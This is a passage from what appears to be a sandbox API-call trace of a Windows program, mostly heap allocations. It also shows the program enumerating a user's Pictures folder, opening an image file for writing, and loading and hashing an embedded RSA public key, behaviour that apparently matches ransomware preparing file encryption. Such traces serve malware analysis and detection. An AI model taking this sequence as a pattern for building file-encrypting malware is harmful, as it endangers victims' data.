(HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.227] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0187.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0187.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.227] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.227] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.228] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.228] PathFindFileNameW (pszPath="") returned="" [0187.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.228] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98f436d0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98f436d0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0187.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.229] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98f436d0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98f436d0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.229] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9109a900, ftCreationTime.dwHighDateTime=0x1d896eb, ftLastAccessTime.dwLowDateTime=0xc0cd6ac0, ftLastAccessTime.dwHighDateTime=0x1d8a53f, ftLastWriteTime.dwLowDateTime=0xc0cd6ac0, ftLastWriteTime.dwHighDateTime=0x1d8a53f, nFileSizeHigh=0x0, nFileSizeLow=0x5083, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="141isvJREPi.gif", cAlternateFileName="141ISV~1.GIF")) returned 1 [0187.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0187.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.229] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\141isvJREPi.gif") returned=".gif" [0187.229] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\141isvJREPi.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\141isvjrepi.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.231] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=20611) returned 1 [0187.231] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.234] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x505d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.234] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.236] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.237] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x5083, lpOverlapped=0x0) returned 1 [0187.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.237] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.238] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.238] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.239] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.239] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.239] GetLastError () returned 0x0 [0187.239] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.239] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.239] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.239] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.239] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5080) returned 0x2d43778 [0187.239] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39688 [0187.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38b08 [0187.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396a0 [0187.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396b8 [0187.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0187.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396e8 [0187.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0187.241] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3bb48 [0187.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0187.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0187.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0187.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0187.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396e8 [0187.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d396b8 [0187.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0187.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0187.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0187.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0187.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.243] GetCurrentThreadId () returned 0x264 [0187.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d379a8 [0187.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0187.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.244] GetCurrentThreadId () returned 0x264 [0187.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0187.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396b8 [0187.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0187.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396e8 [0187.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39700 [0187.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 